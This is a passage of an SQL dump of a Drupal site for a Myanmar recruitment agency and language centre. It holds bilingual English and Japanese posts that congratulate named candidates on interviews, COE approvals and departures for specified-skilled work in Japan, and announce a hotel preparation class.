('activities', 0, 142, 583, 'ja', 0, '<div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-13\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"409c4610-442f-4274-9140-054f09750c0a\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><blockquote><h2>新コメット語学センターの開校</h2></blockquote><p>新年は、7 月の N4 試験に向けて準備を進めている新しい N5 クラスの導入で始まりました。授業は毎日行われ、定期的に評価が行われます。月曜日から木曜日までは、1 日 1 レッスンを実施し、週末 (金曜日から日曜日) は、生徒の興味を維持し、宿題の単調さを避けるために、ポップクイズ セッションを通じて学習を強化する予定です。学校は当社の代理店と提携しているため、コースを修了すると、生徒が独自に面接を受ける必要がなくなります。現在の外職候補者は、日本に到着する前に、当社の教師による実践的な指導を通じて必須の知識を身に付けます。生徒は毎日の学習ルーチンを守る責任があり、当社はカリキュラムを監督し、日本への移行を支援します。</p><img src=\"/sites/default/files/inline-images/0-02-01-0d82578e4eeb95d45b3aea58a31107f4e9c7d0d57db6f2e0574c644b16cd5938_e03eefd818751014.jpg\" data-entity-uuid=\"f5371587-116f-4dac-879a-34801cef5949\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1f139d1e488c49efedfad0063e5adb305fab7ea9b3724aead3dd0aa73bbea6a3_af144a595daab05e.jpg\" data-entity-uuid=\"5c9a38b1-b151-4d2a-85ae-638b9f1bd956\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4db89c7fb62a68759df9f4c1c421f10a418b7580ebe4baa7cd98a002d77c999e_d43d0c99d892dd0d.jpg\" data-entity-uuid=\"924820ef-7e98-4c7d-9106-32fae2827884\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9aa16490a0b9226fe9b699d6c68553737d2095b7aed085bde1f659dbef90491b_a4dd5e0651b48b68.jpg\" data-entity-uuid=\"3836ec4e-123f-431b-8b58-96e7f9419c3d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-90fa91b1bec3ee89f057af76501a016c3ab6ec0c82a9774b2f3bc99ee300f8bf_56859cbe57067f4a.jpg\" data-entity-uuid=\"8bb4a31e-57a7-4a68-adbc-d48eb54b3c39\" data-entity-type=\"file\"><p>&nbsp;</p></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div></div></div></div></div></div><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-14\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"flex-shrink-0 flex flex-col relative items-end\"><div><div class=\"pt-0.5 juice:pt-0\"><div class=\"gizmo-shadow-stroke flex h-6 w-6 items-center justify-center overflow-hidden rounded-full juice:h-8 juice:w-8\"><div class=\"overflow-hidden rounded-full\"><div class=\"relative flex items-center justify-center bg-blue-300 text-white h-full w-full text-xs\"><svg class=\"icon-sm\" xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M12 4a3 3 0 1 0 0 6 3 3 0 0 0 0-6M7 7a5 5 0 1 1 10 0A5 5 0 0 1 7 7m5 8c-3.656 0-6.5 2.75-6.5 6a1 1 0 1 1-2 0c0-4.482 3.872-8 8.5-8s8.5 3.518 8.5 8a1 1 0 1 1-2 0c0-3.25-2.844-6-6.5-6\" clip-rule=\"evenodd\"></path></svg></div><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"user\" data-message-id=\"aaa2496d-8022-456b-a68f-9edc75f88c0f\" dir=\"auto\"><div class=\"relative max-w-[70%]\"><div>&nbsp;</div></div></div></div></div></div></div></div></div></div></div></div></div>', '', 'full_html'),
('activities', 0, 143, 585, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to HNIN WAI WAI NWE &amp; THIDA KHINE for passing the Interview for TOKUTEI GAISHOKU (Restaurant) to work at JAPAN!&nbsp;</p><img data-entity-uuid=\"136a27cc-954b-42b0-971d-8d1b63070dd2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HNIN%20WAI%20WAI%20NWE_0.jpg\"><img data-entity-uuid=\"6521bdaf-c62a-415f-8023-395970ef8845\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THIDA%20KHAING.jpg\">', '', 'full_html'),
('activities', 0, 143, 585, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>HNIN WAI WAI NWE さん</strong>と <strong>THIDA KHINE さん</strong>が、日本で働くための TOKUTEI GAISHOKU (レストラン) の面接に合格しました。おめでとうございます!</p><img src=\"/sites/default/files/inline-images/HNIN%20WAI%20WAI%20NWE_0.jpg\" data-entity-uuid=\"136a27cc-954b-42b0-971d-8d1b63070dd2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THIDA%20KHAING.jpg\" data-entity-uuid=\"6521bdaf-c62a-415f-8023-395970ef8845\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 144, 587, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to <strong>AUNG ZIN OO</strong>, <strong>THAN HTUN NAING</strong> , <strong>HTET WAI AUNG</strong> for passing the Interview in TOKUTEI GAISHOKU (Restaurant) to work at TOKYO City , JAPAN.&nbsp;</p><p>&nbsp;</p><img data-entity-uuid=\"91a6093b-44a2-4e84-a3da-135e75bce780\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/AUNG%20ZIN%20OO.jpg\"><img data-entity-uuid=\"e80c6b10-38a3-4efb-b6ab-c4da3ac20638\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HTET%20WAI%20AUNG.jpg\"><img data-entity-uuid=\"3c95954f-9900-47ee-a83c-7c7c57223146\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THAN%20HTUN%20NAING.jpg\">', '', 'full_html'),
('activities', 0, 144, 587, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>AUNG ZIN OO</strong>、<strong>THAN HTUN NAING</strong>、<strong>HTET WAI AUNG </strong>の 3 名が、東京市にある特定外食 (レストラン) の面接に合格し、日本で働くことになりました。おめでとうございます。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/AUNG%20ZIN%20OO.jpg\" data-entity-uuid=\"91a6093b-44a2-4e84-a3da-135e75bce780\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HTET%20WAI%20AUNG.jpg\" data-entity-uuid=\"e80c6b10-38a3-4efb-b6ab-c4da3ac20638\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THAN%20HTUN%20NAING.jpg\" data-entity-uuid=\"3c95954f-9900-47ee-a83c-7c7c57223146\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 145, 589, 'en', 0, '<blockquote><h2>Congratulations For Getting COE!</h2></blockquote><p>Congratulations KYAW ZIN LATT For Getting COE</p><img data-entity-uuid=\"93bf4257-01d8-460a-90c5-2387e8fe731f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Kyaw%20Zin%20Latt%20COE.png\">', '', 'full_html'),
('activities', 0, 145, 589, 'ja', 0, '<blockquote><h2>COE 取得おめでとうございます!</h2><p>KYAW ZIN LATT さん、COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/Kyaw%20Zin%20Latt%20COE.png\" data-entity-uuid=\"93bf4257-01d8-460a-90c5-2387e8fe731f\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 146, 593, 'en', 0, '<blockquote><h2><strong>Congratulations For Passing the Interview!</strong></h2></blockquote><p>Congratulations THET HTAR MYINT KO &amp; HSU MYAT HMUE &amp; HNIN YU HLAING &amp; WAI WAI KHAING &amp; CHAW HSU THWE For Passing the Interview.</p><img src=\"/sites/default/files/inline-images/0-02-01-3aaac1a8cf46db7afbf1ba279a392d065bc0de9b2e11aa353d05c993ab01f4e6_26416f73e7297c33.jpg\" data-entity-uuid=\"5ba053c9-57d5-46a1-aa41-290b134ad527\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7bbc4935551cb3531971de4e52cce30795a7fb08a9648e45e3b7e2c86b1d593f_f228354916e16e5b.jpg\" data-entity-uuid=\"0d1f997b-9db7-4e2b-8b3f-3caabdfaa4f9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-74586f10937c7b31208857c97264bd1c58356742ddc62774c90c22e038db8a11_fb89567823dc4d23.jpg\" data-entity-uuid=\"e12d1dc7-8dcf-4a4b-85c3-7a00d67c2935\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e69ec795d6cea4ad5b07e285c04dc07e6ee3df95f2047d5f04a532c673e2d924_b1e5d38117488313.jpg\" data-entity-uuid=\"9e8daeaa-660e-40ff-abca-e9176210ec34\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-4b3c2728de3756b346a79f8476f78e46b7f7d46836fa7fbe883c7a0e13f97402_b42b620cfc9f74f4.jpg\" data-entity-uuid=\"06bc64cb-d094-4438-b095-f5a9d0a54f38\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 146, 593, 'ja', 0, '<blockquote><h2>面接合格おめでとうございます！</h2><p>THET HTAR MYINT KO、HSU MYAT HMUE、HNIN YU HLAING、WAI WAI KHAING、CHAW HSU THWE の皆さん、面接合格おめでとうございます。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-3aaac1a8cf46db7afbf1ba279a392d065bc0de9b2e11aa353d05c993ab01f4e6_26416f73e7297c33.jpg\" data-entity-uuid=\"5ba053c9-57d5-46a1-aa41-290b134ad527\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7bbc4935551cb3531971de4e52cce30795a7fb08a9648e45e3b7e2c86b1d593f_f228354916e16e5b.jpg\" data-entity-uuid=\"0d1f997b-9db7-4e2b-8b3f-3caabdfaa4f9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-74586f10937c7b31208857c97264bd1c58356742ddc62774c90c22e038db8a11_fb89567823dc4d23.jpg\" data-entity-uuid=\"e12d1dc7-8dcf-4a4b-85c3-7a00d67c2935\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e69ec795d6cea4ad5b07e285c04dc07e6ee3df95f2047d5f04a532c673e2d924_b1e5d38117488313.jpg\" data-entity-uuid=\"9e8daeaa-660e-40ff-abca-e9176210ec34\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-4b3c2728de3756b346a79f8476f78e46b7f7d46836fa7fbe883c7a0e13f97402_b42b620cfc9f74f4.jpg\" data-entity-uuid=\"06bc64cb-d094-4438-b095-f5a9d0a54f38\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 147, 595, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><h6>Congratulations KYAW ZIN LATT &nbsp;for getting COE with TOKUTEI GAISHOKU to work at JAPAN!&nbsp;</h6><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/kyaw%20zin%20latt%20coe_0.jpg\" data-entity-uuid=\"d5c54eb8-b360-42fd-a621-a02c9b8a0d33\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 147, 595, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><h6>KYAW ZIN LATT さん、TOKUTEI GAISHOKU から COE を取得して日本で働くことができました、おめでとうございます!</h6><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/kyaw%20zin%20latt%20coe_0.jpg\" data-entity-uuid=\"d5c54eb8-b360-42fd-a621-a02c9b8a0d33\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 148, 597, 'en', 0, '<blockquote><h2>Congratulations!&nbsp;</h2></blockquote><p>Congratulations MYO KHANT For Getting COE &nbsp;</p><img data-entity-uuid=\"42659e2d-59b0-406d-821d-154a4a4c5291\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-8bcc150299aff383a3e46cc149e3d1562bb511c9bb2c03579b14d971cbf492ec_9afbe7a470291031.jpg\">', '', 'full_html'),
('activities', 0, 148, 597, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2><p>MYO KHANT さん、COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-06-8bcc150299aff383a3e46cc149e3d1562bb511c9bb2c03579b14d971cbf492ec_9afbe7a470291031.jpg\" data-entity-uuid=\"42659e2d-59b0-406d-821d-154a4a4c5291\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 149, 598, 'en', 0, '<blockquote><h2>Congratulations For Passing the Interview!</h2></blockquote><p>Congratulations THAN WIN SOE &amp; HSU YANDAR &nbsp;For Passing the Interview</p><img data-entity-uuid=\"9b6269cc-ed01-49dc-8e19-ba93f8a81733\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/con%20con%202.jpg\"><img data-entity-uuid=\"75d218dc-cd4d-409a-b96a-ee635cb5eac0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/con%20con.jpg\">', '', 'full_html'),
('activities', 0, 150, 600, 'en', 0, '<blockquote><h2>Training about CPR(Kaigo)</h2></blockquote><p>They are diligently engaged in their endeavors within the Akita district of Japan, hoping for the opportunity to reside in the country for an extended period.</p><img data-entity-uuid=\"ad5e101a-5241-43cd-9069-d760e9ef3c36\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1_4.jpg\"><img data-entity-uuid=\"a20f83b8-a905-41b8-9079-ac4b161e1e7b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/2_4.jpg\"><img data-entity-uuid=\"f6c7d9b8-a004-4b48-947e-c507abda48cd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/3_4.jpg\"><img data-entity-uuid=\"5f8315d4-ffef-4281-a387-e6aa2d39c807\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/4_4.jpg\"><img data-entity-uuid=\"53bf4679-be37-45b4-8b6c-9d7805cee062\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/5_2.jpg\"><img data-entity-uuid=\"b4f638b2-4d3a-4997-869d-30c5ec49b2b7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/6_2.jpg\"><img data-entity-uuid=\"18d57598-7865-4a60-a82a-729bfef38207\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/7_1.jpg\"><img data-entity-uuid=\"c43806d7-2f92-4a6c-8c06-6c82f3900d19\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/8_1.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 150, 600, 'ja', 0, '<blockquote><h2>CPR（介護）に関する研修</h2><p>彼らは秋田県内での活動に熱心に取り組んでおり、長期にわたって秋田県に居住する機会を望んでいます。</p></blockquote><img src=\"/sites/default/files/inline-images/1_4.jpg\" data-entity-uuid=\"ad5e101a-5241-43cd-9069-d760e9ef3c36\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_4.jpg\" data-entity-uuid=\"a20f83b8-a905-41b8-9079-ac4b161e1e7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_4.jpg\" data-entity-uuid=\"f6c7d9b8-a004-4b48-947e-c507abda48cd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_4.jpg\" data-entity-uuid=\"5f8315d4-ffef-4281-a387-e6aa2d39c807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5_2.jpg\" data-entity-uuid=\"53bf4679-be37-45b4-8b6c-9d7805cee062\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6_2.jpg\" data-entity-uuid=\"b4f638b2-4d3a-4997-869d-30c5ec49b2b7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/7_1.jpg\" data-entity-uuid=\"18d57598-7865-4a60-a82a-729bfef38207\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/8_1.jpg\" data-entity-uuid=\"c43806d7-2f92-4a6c-8c06-6c82f3900d19\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 151, 602, 'en', 0, '<blockquote><h2>Congratulations For Getting COE !</h2></blockquote><p>Congratulations HLAING MEE MEE HTIKE &amp; PYAE SU SU SAN For Getting COE</p><img data-entity-uuid=\"6e7d323c-8cd7-45b2-abbf-dcb0a548499a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-1f97a5a9475b3df30898f35e7d78128e278077a680ad7ad99d9d7db9b6121a9e_9e9a91b98a3dc4dc.jpg\"><img>', '', 'full_html'),
('activities', 0, 151, 602, 'ja', 0, '<blockquote><h2>COE 取得おめでとうございます！</h2><p>HLAING MEE MEE HTIKE と PYAE SU SU SAN、COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-02-1f97a5a9475b3df30898f35e7d78128e278077a680ad7ad99d9d7db9b6121a9e_9e9a91b98a3dc4dc.jpg\" data-entity-uuid=\"6e7d323c-8cd7-45b2-abbf-dcb0a548499a\" data-entity-type=\"file\"><p><img></p>', '', 'full_html'),
('activities', 0, 152, 604, 'en', 0, '<blockquote><h3><strong>COE 取得おめでとうございます! &nbsp; &nbsp;</strong></h3><p>HLAING MEE MEE HTIKE さん、COE 取得おめでとうございます</p></blockquote>', '', 'full_html'),
('activities', 0, 152, 604, 'ja', 0, '<blockquote><h3><strong>COE 取得おめでとうございます! &nbsp; &nbsp;</strong></h3><p>HLAING MEE MEE HTIKE さん、COE 取得おめでとうございます</p></blockquote>', '', 'full_html'),
('activities', 0, 153, 606, 'en', 0, '<blockquote><h2>Congratulations For Getting COE!</h2></blockquote><p>Congratulations MOE SET NAING &amp; PAING THU SAN &amp; HTET LIN AUNG &amp; THANT ZIN WIN &amp; HPONE MYAT NAING &amp; EI KAY ZIN For Getting COE</p><img data-entity-uuid=\"3b801756-32a5-4ecc-916b-2829712192f1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-1b76df179d462b63dc7fd4d74ec23673ef537da2ef9512cda5a1f963c9121c2c_9d7d4d6411a5fc13.jpg\"><img data-entity-uuid=\"7075356e-77d5-46e2-a434-f266e7caeb6b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-3a51f787771946ab3b49e85d5cdce3b0a00767a9e154d09d7fe9c1d533ce3795_c1cf428317a08225.jpg\"><img data-entity-uuid=\"c806e6d9-7a65-402c-a48c-2ac1ea1d3457\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-40a8a26850c7e39adcd5f51733f0cd108b22df09bdf0bb90d81527e7aa22b163_6e5f738ce599cf66.jpg\"><img data-entity-uuid=\"2786a3aa-2f5d-4526-aab2-104d92d9644f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-4743d193219cdddf8b7397127a2d621408ebda3d0c377bae80bcf5bb80d28018_8dd8dd9fdbb97404.jpg\"><img data-entity-uuid=\"a4b5ff6e-5d7e-4e5f-ba7f-0d96456985b8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-c641d9f9e2a41a117c982c04052ae940f92411b3304b1f98433807656c14a46c_82f9081fbfbb1a33.jpg\"><img data-entity-uuid=\"4fb3e6b3-63f6-4639-98a9-ef6063b89503\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-02-f7aefec25d5c2a64f7d9ae30ae581f90cc511220e72b21a7e729f1018c76d419_cdeef27543ac2745.jpg\">', '', 'full_html'),
('activities', 0, 153, 606, 'ja', 0, '<blockquote><h2>COE 取得おめでとうございます!</h2><p>MOE SET NAING、PAING THU SAN、HTET LIN AUNG、THANT ZIN WIN、HPONE MYAT NAING、EI KAY ZIN の COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-02-1b76df179d462b63dc7fd4d74ec23673ef537da2ef9512cda5a1f963c9121c2c_9d7d4d6411a5fc13.jpg\" data-entity-uuid=\"3b801756-32a5-4ecc-916b-2829712192f1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-3a51f787771946ab3b49e85d5cdce3b0a00767a9e154d09d7fe9c1d533ce3795_c1cf428317a08225.jpg\" data-entity-uuid=\"7075356e-77d5-46e2-a434-f266e7caeb6b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-40a8a26850c7e39adcd5f51733f0cd108b22df09bdf0bb90d81527e7aa22b163_6e5f738ce599cf66.jpg\" data-entity-uuid=\"c806e6d9-7a65-402c-a48c-2ac1ea1d3457\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-4743d193219cdddf8b7397127a2d621408ebda3d0c377bae80bcf5bb80d28018_8dd8dd9fdbb97404.jpg\" data-entity-uuid=\"2786a3aa-2f5d-4526-aab2-104d92d9644f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-c641d9f9e2a41a117c982c04052ae940f92411b3304b1f98433807656c14a46c_82f9081fbfbb1a33.jpg\" data-entity-uuid=\"a4b5ff6e-5d7e-4e5f-ba7f-0d96456985b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-02-f7aefec25d5c2a64f7d9ae30ae581f90cc511220e72b21a7e729f1018c76d419_cdeef27543ac2745.jpg\" data-entity-uuid=\"4fb3e6b3-63f6-4639-98a9-ef6063b89503\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 154, 609, 'en', 0, '<p><strong>Departure to Japan – 14 June 2026</strong></p><p>New Comet Trading Agency is pleased to announce that the following candidates successfully departed for Japan on 14 June 2026 under the Specified Skilled Worker (Kaigo) Program.</p><ul><li>Khin Moe Thi</li><li>Khin Min Cho</li><li>Aye Mya Nilar Oo</li><li>Nan Dar Kyaw</li><li>Ei Ei Phyo</li></ul><p>We sincerely congratulate all five candidates and wish them success in their new careers in Japan.</p><p>May they enjoy a safe journey, achieve their professional goals, and become a source of pride and support for their families.</p><p>New Comet Trading Agency will continue to support Myanmar workers in pursuing employment opportunities abroad.</p>', '', 'full_html'),
('activities', 0, 154, 609, 'ja', 0, '<p data-start=\"940\" data-end=\"959\"><strong data-start=\"940\" data-end=\"959\">2026年6月14日 日本出発</strong></p><p data-start=\"961\" data-end=\"1027\">ニューコメット・トレーディング・エージェンシーは、以下の5名の候補者が特定技能（介護）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1029\" data-end=\"1128\">• KHIN MOE THI さん<br>• KHIN MIN CHO さん<br>• AYE MYA NILAR OO さん<br>• NAN DAR KYAW さん<br>• EI EI PHYO さん</p><p data-start=\"1130\" data-end=\"1159\">皆様の新しいキャリアのスタートを心よりお祝い申し上げます。</p><p data-start=\"1161\" data-end=\"1213\">日本での生活と仕事が順調に進み、ご家族の支えとなる素晴らしい人材としてご活躍されることを願っております。</p><p data-start=\"1215\" data-end=\"1266\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材の海外就労を支援してまいります。</p>', '', 'full_html'),
('announcement', 0, 155, 611, 'en', 0, '<p><strong>Hotel Tokutei Preparation Class – New Intake Open</strong></p><p>New Comet Language Center is pleased to announce the opening of a new Hotel Tokutei Preparation Class for candidates who wish to work in hotels, ryokans, and resorts in Japan.</p><p>This course is designed to help students prepare for the Specified Skilled Worker (Tokutei Ginou) Hotel Examination, job interviews, and future workplace responsibilities in the hospitality industry.</p><p><strong>Course Information</strong></p><p>Start Date: 15 June 2026</p><p>Class Days:<br>Monday – Thursday</p><p>Class Time:<br>11:00 AM – 12:30 PM</p><p>Course Duration:<br>2 Months</p><p>Course Fee:<br>180,000 MMK</p><p><strong>Special Benefits</strong></p><p>• Textbook Included<br>• Uniform Included</p><p>The Hotel Tokutei sector is currently one of the most in-demand industries in Japan.</p><p>This course is recommended for individuals who wish to:</p><p>• Prepare for the Hotel Tokutei Examination<br>• Build a career in the hospitality industry<br>• Work in Japan through the Specified Skilled Worker Program</p><p>For further information, please contact us through our Facebook Page Messenger.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/hotel-class-schedule-1.jpg\" data-entity-uuid=\"f6a7552f-366e-43ff-81c2-0b8b162f2677\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/hotel-class-schedule-2.jpg\" data-entity-uuid=\"05868599-9dfd-4060-95f1-78dbb8614222\" data-entity-type=\"file\">', '', 'full_html'),
('announcement', 0, 155, 611, 'ja', 0, '<p data-start=\"1201\" data-end=\"1222\"><strong data-start=\"1201\" data-end=\"1222\">ホテル特定技能対策クラス 新規開講</strong></p><p data-start=\"1224\" data-end=\"1300\">ニューコメット・ランゲージセンターでは、日本のホテル・旅館・リゾート施設での就職を目指す方々を対象に、ホテル分野特定技能試験対策クラスを開講いたします。</p><p data-start=\"1302\" data-end=\"1366\">本コースでは、特定技能（宿泊分野）試験対策だけでなく、面接対策や実際の職場で必要となる知識やマナーについても学ぶことができます。</p><p data-start=\"1368\" data-end=\"1377\"><strong data-start=\"1368\" data-end=\"1377\">コース概要</strong></p><p data-start=\"1379\" data-end=\"1394\">開講日：<br>2026年6月15日</p><p data-start=\"1396\" data-end=\"1408\">授業日：<br>月曜日～木曜日</p><p data-start=\"1410\" data-end=\"1433\">授業時間：<br>午前11時00分～午後12時30分</p><p data-start=\"1435\" data-end=\"1444\">受講期間：<br>2か月</p><p data-start=\"1446\" data-end=\"1462\">受講料：<br>180,000 MMK</p><p data-start=\"1464\" data-end=\"1470\"><strong data-start=\"1464\" data-end=\"1470\">特典</strong></p><p data-start=\"1472\" data-end=\"1488\">• 教科書付き<br>• 制服付き</p><p data-start=\"1490\" data-end=\"1520\">宿泊分野の特定技能人材は、現在日本国内で高い需要があります。</p><p data-start=\"1522\" data-end=\"1542\">本コースは以下のような方におすすめです。</p><p data-start=\"1544\" data-end=\"1605\">• ホテル特定技能試験の合格を目指す方<br>• ホスピタリティ業界に興味のある方<br>• 日本で働くことを目標としている方</p><p data-start=\"1607\" data-end=\"1651\">詳細については、Facebookページのメッセンジャーよりお気軽にお問い合わせください。</p><hr><img data-entity-uuid=\"d3949097-3a11-4865-a6ac-80b245fc2aae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/hotel-class-schedule-1_0.jpg\"><p>&nbsp;</p><img data-entity-uuid=\"814b935c-75d7-4711-87d8-c5e6c258bc59\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/hotel-class-schedule-2_0.jpg\">', '', 'full_html'),
('activities', 0, 156, 613, 'en', 0, '<p>On April 21, 2026, New Comet Agency proudly bid farewell to our candidate, Ms. Thwel Thwel Aye, as she departed for Japan. She will be working in the restaurant and food service industry under the Specified Skilled Worker (Tokutei Ginou) program.</p><p>The entire team at New Comet Agency wishes her a safe flight and great success in her new career. We are confident that she will excel in her work in Japan and make her family proud. Congratulations!</p>', '', 'full_html'),
('activities', 0, 156, 613, 'ja', 0, '<p data-path-to-node=\"6\">2026年4月21日、当機関（New Comet Agency）を通じて採用された候補生、Thwel Thwel Ayeさんが、特定技能（外食業）の資格で日本へ向けて出発いたしました。</p><p data-path-to-node=\"7\">彼女の安全なフライトと日本でのご活躍、そしてご家族の誇りとなるような素晴らしいキャリアを築かれることをスタッフ一同、心よりお祈り申し上げます。</p>', '', 'full_html'),
